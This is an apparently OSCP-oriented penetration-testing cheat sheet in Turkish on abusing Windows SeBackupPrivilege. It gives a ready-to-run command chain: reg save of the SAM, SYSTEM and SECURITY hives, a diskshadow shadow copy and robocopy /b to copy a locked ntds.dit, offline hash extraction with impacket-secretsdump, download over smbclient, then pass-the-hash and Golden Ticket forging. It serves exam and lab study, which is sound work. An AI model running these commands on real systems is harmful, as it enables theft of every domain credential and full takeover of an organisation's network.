FOOTHOLD Metodoloji Cheat-sheet
PrivEsc ✓ EXAM-SAFE orta

SeBackupPrivilege / SeRestorePrivilege → SAM+SYSTEM / ntds.dit Loot

SeBackupPrivilege (ve genelde yanında gelen SeRestorePrivilege) raw dosya okuma yetkisi verir. Bu yetkiyle SAM+SYSTEM hive'larını dökersin, ya da DC'de diskshadow/robocopy /b ile kilitli ntds.dit'i kopyalayıp offline secretsdump ile tüm domain hash'lerini çekersin.

Bilgi: ÖN KOŞULLAR
  • whoami /priv çıktısında SeBackupPrivilege = Enabled (genelde Backup Operators grubu)
  • ntds.dit hedefi için: yetkiyi DC üzerinde tutuyor olmak
┌──

Komutlar

cmd ✓ EXAM-SAFE user
whoami /priv | findstr /i "SeBackup SeRestore"
SeBackupPrivilege / SeRestorePrivilege Enabled mı kontrol et. HackTricks — Windows Local Privilege Escalation (Privilege Abuse)
cmd ✓ EXAM-SAFE user
reg save HKLM\SAM C:\Temp\SAM.hive && reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive
SAM ve SYSTEM hive'larını diske kaydet (SeBackupPrivilege reg save'e raw okuma sağlar). HackTricks — Windows Local Privilege Escalation (SeBackupPrivilege)
reg ✓ EXAM-SAFE user
reg save HKLM\SECURITY C:\Temp\SECURITY.hive
Cached creds / LSA secrets için SECURITY hive'ını da al (opsiyonel). HackTricks — Dumping LSA Secrets
impacket-secretsdump ✓ EXAM-SAFE
impacket-secretsdump -sam SAM.hive -system SYSTEM.hive -security SECURITY.hive LOCAL
Kali tarafına çektiğin hive'lardan offline lokal hash + LSA secret dökümü. WADComs — Impacket secretsdump (offline); HackTricks — secretsdump
diskshadow ✓ EXAM-SAFE user
echo set context persistent nowriters > C:\Temp\sh.txt & echo add volume c: alias raj >> C:\Temp\sh.txt & echo create >> C:\Temp\sh.txt & echo expose %raj% z: >> C:\Temp\sh.txt & diskshadow /s C:\Temp\sh.txt
DC üzerinde VSS shadow copy oluşturup Z: olarak mount et — kilitli ntds.dit'e erişim için. HackTricks — SeBackupPrivilege (diskshadow + ntds.dit)
robocopy ✓ EXAM-SAFE user
robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit
robocopy /b backup-mode ile shadow copy içinden kilitli ntds.dit'i kopyala (SeBackupPrivilege gerektirir). HackTricks — SeBackupPrivilege (robocopy /b)
impacket-secretsdump ✓ EXAM-SAFE
impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL
ntds.dit + SYSTEM hive'dan tüm domain kullanıcı NT hash'lerini offline dök (DCSync benzeri tam loot). WADComs — Impacket secretsdump -ntds; HackTricks — Dumping ntds.dit
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}}
Backup Operators üyesi WinRM hesabıyla bağlanıp yukarıdaki adımları çalıştır; sonra hive'ları indir. HackTricks — Evil-WinRM
smbclient ✓ EXAM-SAFE user
smbclient //{{RHOST}}/C$ -U {{DOMAIN}}/{{USER}}%{{PASS}} -c "cd Temp; get SAM.hive; get SYSTEM.hive; get ntds.dit"
Dökülen hive/ntds dosyalarını SMB üzerinden Kali'ye indir. HackTricks — Pentesting SMB (smbclient)

SeBackupPrivilege Nedir, Neden Tehlikeli?

SeBackupPrivilege, yedekleme yazılımlarının her dosyayı (ACL’leri bypass ederek) raw okuyabilmesi için verilen bir token yetkisidir. Pratikte bu, dosya DACL’leri seni durdursa bile diski byte-byte okuyabilmen demektir. Bu yetki neredeyse her zaman Backup Operators grubu üyeliğiyle gelir ve genelde SeRestorePrivilege (raw yazma) ile birlikte bulunur. OSCP’de tipik senaryo: Backup Operators grubundaki düşük yetkili bir hesapla WinRM/RDP erişimin var ve admin değilsin.

Tespit / Enumeration

İlk iş her zaman whoami /priv. Çıktıda SeBackupPrivilege ve SeRestorePrivilege satırlarının Enabled olması kritik — sadece “listed” değil aktif olmalı. Grup üyeliğini whoami /groups ya da net localgroup "Backup Operators" ile doğrula. Eğer privilege Enabled görünmüyorsa ama gruptaysan, integrity level / UAC tokeni sorunu olabilir; elevated bir bağlam (örn. WinRM zaten high-integrity token verir) gerekir.

Senaryo 1 — Lokal SAM + SYSTEM Dump (member server / workstation)

Domain Controller olmayan makinelerde hedef lokal Administrator hash’idir. reg save komutu SeBackupPrivilege sayesinde normalde okunamayan HKLM\SAM ve HKLM\SYSTEM hive’larını diske yazar. Bu hive’ları Kali’ye indirip impacket-secretsdump -sam ... -system ... LOCAL ile çözersin. Çıkan lokal Administrator NT hash’ini sonra pass-the-hash ile kullanabilirsin (örn. netexec smb {{RHOST}} -u Administrator -H {{NTHASH}} veya evil-winrm -H {{NTHASH}}). SECURITY hive’ını da alırsan cached domain creds ve LSA secret’larını çıkarabilirsin.

Senaryo 2 — Domain Controller’da ntds.dit (tam domain compromise)

DC üzerinde ntds.dit aktif kullanımda olduğu için dosya kilitlidir; doğrudan kopyalanamaz. İki standart yol var:

A) diskshadow + robocopy /b

  1. diskshadow script’i ile C: volume’unun bir VSS shadow copy’sini oluşturup Z: olarak expose et.
  2. robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit/b (backup mode) bayrağı SeBackupPrivilege’i kullanarak kilitli dosyayı kopyalar.
  3. Aynı şekilde reg save HKLM\SYSTEM ile SYSTEM hive’ını al (ntds şifreleme anahtarı için şart).
  4. Her ikisini Kali’ye indir, impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL çalıştır → tüm domain kullanıcılarının NT hash’leri (krbtgt dahil, Golden Ticket için).

B) Alternatif diskshadow tek-satır

Bazı OSCP makinelerinde diskshadow interaktif konsolu CRLF satır sonu ister; script dosyasını Windows satır sonlarıyla (\r\n) hazırla. Eğer add volume c: hata verirse alias kısmını sadeleştir.

Pass-the-Hash ile Devam

Elde ettiğin hash’lerle impacket-psexec, impacket-wmiexec, evil-winrm -H, ya da netexec üzerinden lateral movement / DC takeover yaparsın. krbtgt hash’i ile impacket-ticketer Golden Ticket kesebilirsin.

OSCP Notları

  • Tüm bu komutlar safe kapsamında; Metasploit gerekmez. Manuel ve deterministik oldukları için exam’da güvenle kullanılır.
  • C:\Temp yoksa önce oluştur (mkdir C:\Temp). İşin bitince temizlik için dosyaları sil ve oluşturduğun shadow copy’yi diskshadow delete shadows ile kaldır.
  • ntds.dit dökümü çok gürültülüdür ve büyük loot sağlar; gerçek angajmanda yazılı yetki olmadan yapma.
┌──

Kaynaklar

↗ HackTricks — Windows Local Privilege Escalation (SeBackupPrivilege / SeRestorePrivilege)↗ HackTricks — SeBackupPrivilege Active Directory (ntds.dit dumping)↗ Impacket — secretsdump.py (offline SAM/NTDS)
0/15 set